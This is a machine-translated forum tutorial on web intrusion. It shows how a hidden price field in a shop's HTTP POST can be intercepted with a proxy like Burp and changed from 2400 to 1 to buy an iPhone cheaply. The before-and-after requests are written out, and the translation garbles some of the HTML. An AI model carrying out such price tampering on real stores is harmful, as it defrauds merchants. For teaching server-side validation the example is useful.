Este artigo é um artigo espelhado de tradução automática, por favor clique aqui para ir para o artigo original.

Vista: 12586|Resposta: 0

[Tutorial de Segurança] Penetração por Intrusão: Aplicação de cabeçalhos HTTP

[Copiar link]
Publicado em 07/02/2015 17:59:07 | | |

Sobre a aplicação dos cabeçalhos HTTP

O cabeçalho http é comumente usado no mecanismo de transmissão de sites, mas a maioria dos iniciantes na China não percebeu essa parte; este artigo é dedicado apenas a iniciantes, o papel do cabeçalho http no processo de intrusão.

Pegue a página de compras como exemplo para analisar uma pequena parte do papel dos cabeçalhos HTTP.

Primeiro, vamos analisar um formulário na página de compras.

<método de forma="post" ação="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<tipo de entrada="oculto" nome="preço" valor="449">

<input type="submit" value="Buy">

</form>

Durante o processo de abertura, tire uma captura de tela do cabeçalho da mensagem http dele e dê uma olhada

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantidade=1&preço=2400

Embora o campo preço não seja exibido na página ao abrir a página de compras, ele ainda pode ser editado e operado pelo usuário.

Existem duas maneiras de conseguir edição

1. Salve o código-fonte HTML para modificação e depois recarregue no navegador para executar

2. Usar interceptação de proxy para modificar cabeçalhos HTTP (construção de proxy no tool burp)

Pegue o cabeçalho HTTP acima como exemplo
Antes da mudança
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantidade=1&preço=2400

Após a mudança
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantidade=1&preço=1


Na última linha, o preço tem 2400 e, se mudarmos para 1, podemos conseguir o iPhone 4S por um preço mais barato.

Este artigo apenas oferece uma ideia de ganhos inesperados, como a injeção de LDAP.




Anterior:Método de Implementação de Senha para Recuperação de Senha do MySQL Esquecido
Próximo:Injeção SQL para obter o caminho completo do site
Disclaimer:
Todo software, material de programação ou artigos publicados pela Code Farmer Network são apenas para fins de aprendizado e pesquisa; O conteúdo acima não deve ser usado para fins comerciais ou ilegais, caso contrário, os usuários terão todas as consequências. As informações deste site vêm da Internet, e disputas de direitos autorais não têm nada a ver com este site. Você deve deletar completamente o conteúdo acima do seu computador em até 24 horas após o download. Se você gosta do programa, por favor, apoie um software genuíno, compre o registro e obtenha serviços genuínos melhores. Se houver qualquer infração, por favor, entre em contato conosco por e-mail.

Mail To:help@itsvse.com